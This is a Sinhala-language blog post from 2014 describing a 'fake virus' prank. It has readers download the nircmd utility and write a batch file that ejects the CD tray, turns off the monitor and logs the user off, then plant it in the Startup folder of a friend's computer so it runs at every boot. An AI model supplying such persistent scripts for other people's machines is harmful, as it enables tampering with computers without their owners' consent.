මෙම වෙබ් අඩවිය යාවත්කාලින නොවන බැවින් මෙහි ඇති ඇතැම් ලිපිවල බාගත කිරීමේ ලිපින අක්‍රිය වී ඇත පරිශිලනය කරන ඔබට මාගේ කණගාටුව අපගේ නව වෙබ් අඩවිය WWW.SLETEC.COMවෙත පැමිණෙන්න .

Saturday, August 2, 2014

Computer Virus එකක්

 https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcQepMlsQuinOLT3k93ald6bDwg0cTZPJWWS7cj4dMz8_U3H4F__
Computer Virus එකක් කිව්වට මේක virus එකක්ම නෙමෙයි...  මේක පෙ‍ාඩි අතල් එකක්.....
1. එකපාරම CD Rom එක open වෙලා close වෙන‍වා
2. Monitor එකේ power off වෙනවා
3. User Log out කරවනවා
4. Computer එක turn off කරවනවා


මෙහෙම වෙනකොට ඕනම කෙනෙක්ට හිතෙනවනෙ Virus එකක් ගිහින් කියලා.
මුලින්ම ඔයාලට කරන්න තියෙන්නෙ nircmd.exe කියන nifty utility එක මෙතනින් Download කර ගන්න එකයි.
http://www.mediafire.com/download/vll91l5vjwtakot/nircmd.zip
ඊට පස්සෙ ඒක extract කරල එකෙ තියන nircmd.exe එක bouble click කරල එන window එකේ “Copy To Windows Directory“. කියන එක click කරන්න.
ඊට පස්සෙ notepad open කරලා bat file එකක් create කරගන්න තමයි ඔයාලය කරන්න තියෙන්නෙ. ඒකෙ ඇතුලත් වෙන්න ඕන දේවල් තමයි පහල තියෙන්නෙ. ලේසියට එක copy කරල paste එකක් දාගන්න.

cd %windir%

nircmd.exe cdrom open e:

nircmd.exe cdrom close e:

nircmd.exe monitor off

nircmd.exe exitwin logoff

ඊට පස්සෙ මේක fun.bat කියලා යාලුවගෙ Computer එකේ ඔයාලට කැමති තැනක save කරන්න.
හැබැයි හොදට මතක තියාගන්න. යාලුවගේ Computer එකේ CD Rom එක එහෙම තියන තැන, ඒකියන්නෙ D:ද,E:ද,F:ද,....etc කියලා හරියටම notepad එකේ type කරන්න. 
ඊට පස්සේ save කරගත්ත bat file එක Start=> All Programs=> Startup එකට drag කරන්න. 
Computer එක on වෙන හැම වාරයක් පාසාම මේ දේ සිද්ද වෙනවා. මේවා කරලා ගුටි කන්න එපා හො‍දේ...

sassasa

‍‍මෙම ලිපියෙන් ඔයාලට යම් දැනුමක් ලැබුණි නම්.. කමෙන්ට් එකක් දැමීමට කාරුණීක වන්න.

0 comments:

Post a Comment

Referral Banners

Recent Posts

 

Copyright @ 2014 රවීගේ විප්ලවය.